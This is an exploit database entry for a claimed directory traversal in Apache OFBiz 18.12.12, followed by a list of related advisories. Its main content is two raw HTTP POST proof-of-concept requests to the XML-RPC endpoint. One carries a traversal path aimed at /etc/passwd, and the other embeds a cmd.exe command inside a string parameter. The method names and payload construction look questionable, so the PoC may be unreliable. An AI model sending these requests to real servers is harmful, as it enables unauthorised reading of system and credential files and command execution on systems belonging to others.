Lucene search
Abdualhadi khalifa1337DAY-ID-39617HistoryMay 19, 2024 - 12:00 a.m.
Apache OFBiz 18.12.12 - Directory Traversal Vulnerability
2024-05-1900:00:00
Abdualhadi khalifa
0day.today
56
apache ofbiz
directory traversal
vulnerability
exploit
sensitive data access
xmlrpc
windows 10
# Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal
# Google Dork: N/A
# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)
# Vendor Homepage: https://ofbiz.apache.org/
## Software Link: https://ofbiz.apache.org/download.html
# Version: below <=18.12.12
# Tested on: Windows10
Poc.
1-
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>
OR
2-
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>
Related
metasploit
metasploit
Apache OFBiz Forgot Password Directory Traversal
2024-06-14 23:41:12
nvd
nvd
CVE-2024-32113
2024-05-08 15:15:10
cve
cve
CVE-2024-32113
2024-05-08 15:15:10
cvelist
cvelist
CVE-2024-32113 Apache OFBiz: Path traversal leading to RCE
2024-05-08 14:50:07
packetstorm
packetstorm
Apache OFBiz Forgot Password Directory Traversal
2024-06-18 00:00:00
nuclei
nuclei
Apache OFBiz Directory Traversal - Remote Code Execution
2024-06-14 16:26:31
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up 06/21/2024
2024-06-21 18:53:52